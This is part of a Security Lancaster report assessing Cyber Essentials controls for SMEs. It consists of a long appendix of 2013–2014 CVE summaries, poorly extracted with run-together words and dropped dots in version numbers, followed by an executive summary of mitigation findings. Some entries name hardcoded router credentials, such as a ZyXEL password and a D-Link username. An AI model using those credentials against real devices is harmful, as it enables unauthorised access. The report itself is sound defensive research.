CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
Executive SummaryFindings
This report assesses the Cyber Essentialscontrols effectiveness in mitigating cyber-threats
Two-hundred randomly selected internet-originating vulnerabilities are analysed formitigation across four SME networks with andwithout the Cyber Essentials controls in placeA network built from survey responses is usedto assess the typicality of the SME networksas well as to develop a broader understandingof typical SME network configurations andsecurity-practice
The aggregated results show that withoutthe Cyber Essentials controls none of the
attacks assessed were mitigated on anynetwork This more than anything elseshould be understood by SMEs taking noaction to combat cyber threats simply isnrsquot anoption
With the CE tools more than 99of the vulnerabilities in SMEs interviewedwere mitigated as shown in the figure belowwhich depicts the aggregated results across allcases studied The approx 13 of exploitsonly partially mitigated rely on hardware orsoftware vendors to release patches succinctlyand effectively to combat any vulnerabilities
Once the vendor has released a security
patch the Patch Management componentof Cyber Essentials ensures that the systemreturns to a secure state However up until apatch is released there remains a vulnerabilityin the network For this reason it shouldbe stressed for SMEs to frequently considerwhat services or software is installed whetherit is necessary and whether a more securealternative is available
The few vulnerabilities not mitigated byCyber Essentials are as such because offundamental hard-coded flaws in hardware orsoftware that are unable to be updated orpatched to a secure state
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools havebeen shown to successfully mitigate thevast majority of the attacks assessed it isimportant to note that only rsquocommodity-levelrsquoexploits (as defined by the Cyber EssentialsFramework)[10] viable for a remote attackhave been considered
The scope of this report does notaddress vulnerability to insider threats socialengineering physically proximate attackersor other targeted-attacks it may berecommended that a follow-up study with awider scope be carried out to investigate therisks from other forms of attack with the useof Cyber Essentials
